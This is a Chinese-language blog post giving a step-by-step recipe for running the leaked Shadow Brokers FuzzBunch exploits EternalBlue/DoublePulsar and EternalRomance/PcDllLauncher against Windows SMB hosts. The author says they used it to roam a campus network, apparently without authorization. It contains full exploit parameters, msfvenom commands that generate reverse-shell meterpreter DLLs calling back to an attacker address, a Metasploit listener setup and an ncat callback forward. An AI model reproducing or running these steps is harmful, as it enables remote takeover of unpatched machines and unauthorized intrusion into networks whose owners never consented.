shadowbroker大杀器

搞了两天,弄出个差不多的套路,漫游了一波校园网。

环境要求: python2.6 + pywin32 扩展包

windows/lib/ 下对应的的dll目录添加到系统环境变量里面,还要把 pytrch.py_pytrch 都放到python的扩展包里面,否则运行 fb.py 会报错。

然后运行 fb.py

两个可用套路:

Eternalblue + Doublepulsar

use Eternalblue

中间按照提示填入相应的IP和端口信息

需要注意的是这里:
[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

然后一路确定就OK

use Doublepulsar

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.168.55.50
TargetPort            445
DllPayload            G:\go_64.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL

这里记录一下这个 dll 是怎么生成的:

# target是32位系统
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOSTT=10.170.4.114 \
    LPORT=8888 \
    -f dll > go.dll

# target是64位系统
msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOSTT=10.170.4.114 \
    LPORT=8888 \
    -f dll > go.dll

# 其中 LHOST 和 LPORT 分别是target要连的机器的地址和端口
# msf set payload 的时候也要注意区分:
msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.170.4.114
LHOST => 10.170.4.114
msf exploit(handler) > set LPORT 8888
LPORT => 8888

# 然后 run 就可以了
# 需要注意的是,要先run起来,然后在从 fb.py 这边 execute

Eternalromence + Pcdlllauncher

use Eternalromance

...
..
.

Module: Eternalromance
======================

Name                 Value
----                 -----
NetworkTimeout       60
TargetIp             10.168.55.50
TargetPort           445
PipeName
CallbackIp           10.170.4.114
CallbackPort         45213
CallbackLocalPort    45213
ExploitMethod        Default
Credentials          Anonymous
Protocol             SMB
Target               SERVER_2008R2_SP0
Payload              Callback


# 出现的问题:

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
[-] Error - Unsupported pipe name
[-] Error 45 (processParams)
[!] Plugin failed
[-] Error: Eternalromance Failed
fb Exploit (Eternalromance) >

# 这个时候就要去找一个可用的pipename:

fb Exploit (Eternalromance) > use Namedpipetouch

[!] Entering Plugin Context :: Namedpipetouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.168.55.50

fb Touch (Namedpipetouch) > set

Module: Namedpipetouch
======================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          10.168.55.50
TargetPort        445
Protocol          SMB

fb Touch (Namedpipetouch) > execute

...
...
...


[*] Summary: 1 pipes found
        OS Pipe: lsass rpc - \PIPE\lsarpc
[+] Namedpipetouch Succeeded

# 然后用这个pipe就可以了,或者重新启动一下 fb.py

# 成功之后再使用 Pcdlllauncher

use Pcdlllauncher

Module: Pcdlllauncher
=====================

Name                    Value
----                    -----
ConnectedTcp
XorMask                 0
NetworkTimeout          60
LPFilename              D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll
LPEntryName             ServiceEntry
ImplantFilename
TargetOsArchitecture    x86
PCBehavior              8

# LPFilename 搜一下PC_Exploit.dll的位置,填上
# ImplantFilename 就是上一个套路中的 go.dll or go_64.dll
# 配置好参数以后,从msf这边监听着。

More

还有一件比较重要的事情,因为xp都是开在虚拟机里的,CallBack这里就需要一个端口转发,端口转发的方法有很多,推荐使用ncat:

ncat --sh-exec "ncat 192.168.56.102 45213" -lkp 45213

其中,192.168.56.102是虚拟机的IP

comments powered by Disqus